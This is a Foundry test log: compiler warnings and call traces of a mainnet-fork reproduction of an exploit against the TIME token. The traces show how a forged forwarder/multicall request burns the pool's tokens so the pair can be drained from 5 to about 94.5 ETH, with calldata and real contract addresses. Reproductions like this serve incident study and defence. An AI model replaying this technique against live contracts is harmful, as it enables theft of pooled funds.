Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.29s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-12/TIME_exp.sol:41:5:
   |
41 |     IWETH private constant WETH = IWETH(payable(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 535.44ms (1.87ms CPU time)

Ran 1 test for src/test/2023-12/TIME_exp.sol:ContractTest
[PASS] testExploit() (gas: 300633)
Logs:
  Exploiter ETH balance before attack: 5.000000000000000000
  Exploiter ETH balance after attack: 94.513462587046838316

Traces:
  [7990] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 18730462 [1.873e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(TIME: [0x4b0E9a7dA8bAb813EfAE92A6651019B8bd6c0a29], "TIME")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], "TIME_WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(Forwarder: [0xc82BbE41f2cF04e3a8efA18F7032BDD7f6d98a81], "Forwarder")
    │   └─ ← [Return]
    ├─ [0] VM::label(recoverAddr: [0xa16A5F37774309710711a8B4E83b068306b21724], "recoverAddr")
    │   └─ ← [Return]
    └─ ← [Stop]

  [368733] ContractTest::testExploit()
    ├─ [0] VM::deal(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5000000000000000000 [5e18])
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Exploiter ETH balance before attack", val: 5000000000000000000 [5e18], decimals: 18)
    ├─ [29647] TIME::approve(Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [26969] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::approve(Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x8b0146222bb5766df639486f715210d4d4297b1524c24cb88da71d6f51e2b514: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [24420] WETH::approve(Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [23974] WETH::deposit{value: 5000000000000000000}()
    │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 5000000000000000000 [5e18])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000004563918244f40000
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5000000000000000000 [5e18]
    ├─ [94410] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(5000000000000000000 [5e18], 0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x4b0E9a7dA8bAb813EfAE92A6651019B8bd6c0a29], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701905307 [1.701e9])
    │   ├─ [8225] WETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], 5000000000000000000 [5e18])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], value: 5000000000000000000 [5e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0xae2356b579871f58448c3c26b483094992dbaa3622d503bdcddf415407d7e955: 0x000000000000000000000000000000000000000000000004de0e61219e8da27c → 0x0000000000000000000000000000000000000000000000052371f2a3e381a27c
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000004563918244f40000 → 0
    │   │   └─ ← [Return] true
    │   ├─ [2798] TIME::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   ├─ [2626] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   └─ ← [Return] 0
    │   │   └─ ← [Return] 0
    │   ├─ [2504] TIME_WETH::getReserves() [staticcall]
    │   │   └─ ← [Return] 65692658856160314505008470321 [6.569e28], 89787809617954054780 [8.978e19], 1701389183 [1.701e9]
    │   ├─ [534] WETH::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [staticcall]
    │   │   └─ ← [Return] 94787809617954054780 [9.478e19]
    │   ├─ [69859] TIME_WETH::swap(3455399346269045701666911322 [3.455e27], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [37204] TIME::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3455399346269045701666911322 [3.455e27])
    │   │   │   ├─ [37026] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3455399346269045701666911322 [3.455e27]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3455399346269045701666911322 [3.455e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x79c7adb9b2e35ad5bca0b00bb4a07cfc9737e44b70e7b2704cd527500cebba34: 0x0000000000000000000000000000000000000000d443b19c68ef9e4d6cff5931 → 0x0000000000000000000000000000000000000000c9197456822745637143a4d7
    │   │   │   │   │   @ 0x67f984d158b6ad014f10b5bb5a76c68bc01dfd9cd868ab212ea8801f062649e0: 0 → 0x00000000000000000000000000000000000000000b2a3d45e6c858e9fbbbb45a
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [798] TIME::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [staticcall]
    │   │   │   ├─ [626] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [delegatecall]
    │   │   │   │   └─ ← [Return] 62237259509891268803341558999 [6.223e28]
    │   │   │   └─ ← [Return] 62237259509891268803341558999 [6.223e28]
    │   │   ├─ [534] WETH::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [staticcall]
    │   │   │   └─ ← [Return] 94787809617954054780 [9.478e19]
    │   │   ├─ emit Sync(reserve0: 62237259509891268803341558999 [6.223e28], reserve1: 94787809617954054780 [9.478e19])
    │   │   ├─ emit Swap(sender: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 0, amount1In: 5000000000000000000 [5e18], amount0Out: 3455399346269045701666911322 [3.455e27], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x6569237f000000000004de0e61219e8da27c0000d443b19c68ef9e4d6cff5931 → 0x6570ffb30000000000052371f2a3e381a27c0000c9197456822745637143a4d7
    │   │   │   @ 9: 0x00000000000000000000000000000000000006b90b82119905425061f6741a08 → 0x00000000000000000000000000000000000006e72fbf32484947782a99562578
    │   │   │   @ 10: 0x00000000000000000000002627f7dafba9e36dfb29e907c6df60eba42f54c228 → 0x0000000000000000000000277ebeb7622cdb933b19d2373040c9ec854d3ee188
    │   │   └─ ← [Stop]
    │   ├─ [798] TIME::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   ├─ [626] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   └─ ← [Return] 3455399346269045701666911322 [3.455e27]
    │   │   └─ ← [Return] 3455399346269045701666911322 [3.455e27]
    │   └─ ← [Stop]
    ├─ [3000] PRECOMPILES::ecrecover(0x2038560f9bee81aecd0fa852fae43c9e2a4db94c609c3b91dba5ac0f01b4d5c6, 27, 65847907045785360296324369037753572276712477681648530293081197803666264345077, 8014027068490085741275661760746077238879405461533119087921122232888442787014) [staticcall]
    │   └─ ← [Return] 0x000000000000000000000000a16a5f37774309710711a8b4e83b068306b21724
    ├─ [0] VM::assertEq(recoverAddr: [0xa16A5F37774309710711a8B4E83b068306b21724], recoverAddr: [0xa16A5F37774309710711a8B4E83b068306b21724]) [staticcall]
    │   └─ ← [Return]
    ├─ [77668] Forwarder::execute(ForwardRequest({ from: 0xa16A5F37774309710711a8B4E83b068306b21724, to: 0x4b0E9a7dA8bAb813EfAE92A6651019B8bd6c0a29, value: 0, gas: 5000000 [5e6], nonce: 0, data: 0xac9650d8000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000003842966c680000000000000000000000000000000000000000c9112ec16d958e8da8180000760dc1e043d99394a10605b2fa08f123d60faf840000000000000000 }), 0x9194983a3dbfb5779c09c95f5d830d8435d9ce88b383752c3dfb8a1b84b8c9f511b7c750f1334e2f26ca9be32c2d070a4a023edf745b02468d6cba9a15a494c61b)
    │   ├─ [3000] PRECOMPILES::ecrecover(0x2038560f9bee81aecd0fa852fae43c9e2a4db94c609c3b91dba5ac0f01b4d5c6, 27, 65847907045785360296324369037753572276712477681648530293081197803666264345077, 8014027068490085741275661760746077238879405461533119087921122232888442787014) [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000a16a5f37774309710711a8b4e83b068306b21724
    │   ├─ [46447] TIME::multicall([0x42966c680000000000000000000000000000000000000000c9112ec16d958e8da8180000760dc1e043d99394a10605b2fa08f123d60faf84])
    │   │   ├─ [46236] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::multicall([0x42966c680000000000000000000000000000000000000000c9112ec16d958e8da8180000760dc1e043d99394a10605b2fa08f123d60faf84]) [delegatecall]
    │   │   │   ├─ [43617] TIME::burn(62227259510000000000000000000 [6.222e28]) [delegatecall]
    │   │   │   │   ├─ [43448] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::burn(62227259510000000000000000000 [6.222e28]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], to: 0x0000000000000000000000000000000000000000, value: 62227259510000000000000000000 [6.222e28])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x79c7adb9b2e35ad5bca0b00bb4a07cfc9737e44b70e7b2704cd527500cebba34: 0x0000000000000000000000000000000000000000c9197456822745637143a4d7 → 0x0000000000000000000000000000000000000000000845951491b6d5c92ba4d7
    │   │   │   │   │   │   @ 406: 1 → 2
    │   │   │   │   │   │   @ 203: 0x0000000000000000000000000000000000000000e04ee0ccb27ac646ac000000 → 0x0000000000000000000000000000000000000000173db20b44e537b903e80000
    │   │   │   │   │   │   @ 0x828feda00a4b64eb35101b6df8f6c29717b1ea6bae5dd03d3ddada8de0a9e7cc: 0 → 0x00000000000000000000000000000000173db20b44e537b903e80000011dcdde
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   └─ ← [Return] [0x]
    │   │   └─ ← [Return] [0x]
    │   ├─  storage changes:
    │   │   @ 0xf2e3b399eb650a0b09b4c75e6b2abebf230c0025e03ada2c451672049d14c5cd: 0 → 1
    │   └─ ← [Return] true, 0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000
    ├─ [7850] TIME_WETH::sync()
    │   ├─ [798] TIME::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [staticcall]
    │   │   ├─ [626] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [delegatecall]
    │   │   │   └─ ← [Return] 9999999891268803341558999 [9.999e24]
    │   │   └─ ← [Return] 9999999891268803341558999 [9.999e24]
    │   ├─ [534] WETH::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [staticcall]
    │   │   └─ ← [Return] 94787809617954054780 [9.478e19]
    │   ├─ emit Sync(reserve0: 9999999891268803341558999 [9.999e24], reserve1: 94787809617954054780 [9.478e19])
    │   ├─  storage changes:
    │   │   @ 8: 0x6570ffb30000000000052371f2a3e381a27c0000c9197456822745637143a4d7 → 0x6570ffb30000000000052371f2a3e381a27c0000000845951491b6d5c92ba4d7
    │   └─ ← [Stop]
    ├─ [798] TIME::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [626] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 3455399346269045701666911322 [3.455e27]
    │   └─ ← [Return] 3455399346269045701666911322 [3.455e27]
    ├─ [53045] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(3455399346269045701666911322 [3.455e27], 0, [0x4b0E9a7dA8bAb813EfAE92A6651019B8bd6c0a29, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701905307 [1.701e9])
    │   ├─ [6932] TIME::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], 3455399346269045701666911322 [3.455e27])
    │   │   ├─ [6748] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], 3455399346269045701666911322 [3.455e27]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], value: 3455399346269045701666911322 [3.455e27])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x67f984d158b6ad014f10b5bb5a76c68bc01dfd9cd868ab212ea8801f062649e0: 0x00000000000000000000000000000000000000000b2a3d45e6c858e9fbbbb45a → 0
    │   │   │   │   @ 0x79c7adb9b2e35ad5bca0b00bb4a07cfc9737e44b70e7b2704cd527500cebba34: 0x0000000000000000000000000000000000000000000845951491b6d5c92ba4d7 → 0x00000000000000000000000000000000000000000b3282dafb5a0fbfc4e75931
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [504] TIME_WETH::getReserves() [staticcall]
    │   │   └─ ← [Return] 9999999891268803341558999 [9.999e24], 94787809617954054780 [9.478e19], 1701904307 [1.701e9]
    │   ├─ [798] TIME::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [staticcall]
    │   │   ├─ [626] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [delegatecall]
    │   │   │   └─ ← [Return] 3465399346160314505008470321 [3.465e27]
    │   │   └─ ← [Return] 3465399346160314505008470321 [3.465e27]
    │   ├─ [36601] TIME_WETH::swap(0, 94513462587046838316 [9.451e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [23162] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 94513462587046838316 [9.451e19])
    │   │   │   ├─ emit Transfer(from: TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 94513462587046838316 [9.451e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000051fa345781919402c
    │   │   │   │   @ 0xae2356b579871f58448c3c26b483094992dbaa3622d503bdcddf415407d7e955: 0x0000000000000000000000000000000000000000000000052371f2a3e381a27c → 0x00000000000000000000000000000000000000000000000003cead2bca686250
    │   │   │   └─ ← [Return] true
    │   │   ├─ [798] TIME::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [staticcall]
    │   │   │   ├─ [626] 0x303A41300BAEb37A1028Af017B17B8A6edC3066a::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [delegatecall]
    │   │   │   │   └─ ← [Return] 3465399346160314505008470321 [3.465e27]
    │   │   │   └─ ← [Return] 3465399346160314505008470321 [3.465e27]
    │   │   ├─ [534] WETH::balanceOf(TIME_WETH: [0x760dc1E043D99394A10605B2FA08F123D60faF84]) [staticcall]
    │   │   │   └─ ← [Return] 274347030907216464 [2.743e17]
    │   │   ├─ emit Sync(reserve0: 3465399346160314505008470321 [3.465e27], reserve1: 274347030907216464 [2.743e17])
    │   │   ├─ emit Swap(sender: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 3455399346269045701666911322 [3.455e27], amount1In: 0, amount0Out: 0, amount1Out: 94513462587046838316 [9.451e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x6570ffb30000000000052371f2a3e381a27c0000000845951491b6d5c92ba4d7 → 0x6570ffb300000000000003cead2bca68625000000b3282dafb5a0fbfc4e75931
    │   │   └─ ← [Stop]
    │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 94513462587046838316 [9.451e19]
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 94513462587046838316 [9.451e19]
    ├─ [9195] WETH::withdraw(94513462587046838316 [9.451e19])
    │   ├─ [55] ContractTest::receive{value: 94513462587046838316}()
    │   │   └─ ← [Stop]
    │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 94513462587046838316 [9.451e19])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000051fa345781919402c → 0
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "Exploiter ETH balance after attack", val: 94513462587046838316 [9.451e19], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.69s (9.27s CPU time)

Ran 2 test suites in 10.72s (11.23s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
